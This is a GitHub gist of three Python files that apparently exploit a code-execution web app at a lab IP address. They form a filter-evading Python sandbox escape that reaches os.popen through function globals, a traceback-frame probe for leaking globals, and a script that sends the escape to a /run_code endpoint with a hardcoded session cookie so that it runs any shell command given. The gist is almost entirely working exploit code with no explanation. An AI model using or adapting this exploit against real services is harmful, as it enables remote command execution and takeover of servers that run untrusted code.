-
-
Save sharpicx/15a4e0b1baa7a4eb8e5465f44c0e7de3 to your computer and use it in GitHub Desktop.
Revisions
-
sharpicx created this gist
Jun 6, 2025 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,6 @@ g = run_code.__globals__ m = g["s"+"ys"].modules o = m["o"+"s"] p = getattr(o, "p"+"o"+"pen") c = p("id") for x in c: print(x) This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,50 @@ import requests import sys import urllib.parse import json import re def cmd(char): payload = ( 'g = run_code.__globals__\r\n' 'm = g["s" + "ys"].modules\r\n' 'o = m["o" + "s"]\r\n' 'p = getattr(o, "p" + "o" + "pen")\r\n' f'c = p("{char}")\r\n' 'for x in c: print(x)' ) return 'code=' + urllib.parse.quote_plus(payload) def send(char): url = "http://10.10.11.62:5000/run_code" headers = { "Host": "10.10.11.62:5000", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Accept": "*/*", "DNT": "1", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "http://10.10.11.62:5000", "Referer": "http://10.10.11.62:5000/", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "en-US,en;q=0.9,id-ID;q=0.8,id;q=0.7", "Connection": "keep-alive", "Cookie": "session=.eJxljDEKwzAQBL9y2VqkSec3pHJngjFCPssHig58EimM_m61JtUWM7Mnli1529kwfE5Q6YMvm_nIcBg5ipXDF9FMVkPoZKvpQZNWCj5T1h8ljST5ibm5_4e3RrmlXZsdqvGxyIrh1S6VYCy-.Z_YS8A.iuN7cPArq-Bg4cFu8NS001ofbRU" } data = cmd(char) response = requests.post(url, headers=headers, data=data) try: output = response.json().get("output", "") cleaned = re.sub(r'\n+', '\n', output.strip()) print(cleaned) except json.JSONDecodeError: print(response.text) if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python a.py \"<command>\"") sys.exit(1) c = sys.argv[1] send(c) This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,9 @@ try: 1 / 0 except Exception as e: print(dir(e)) print(e.__traceback__) tb = e.__traceback__ while tb: print(tb.tb_frame.f_globals) tb = tb.tb_next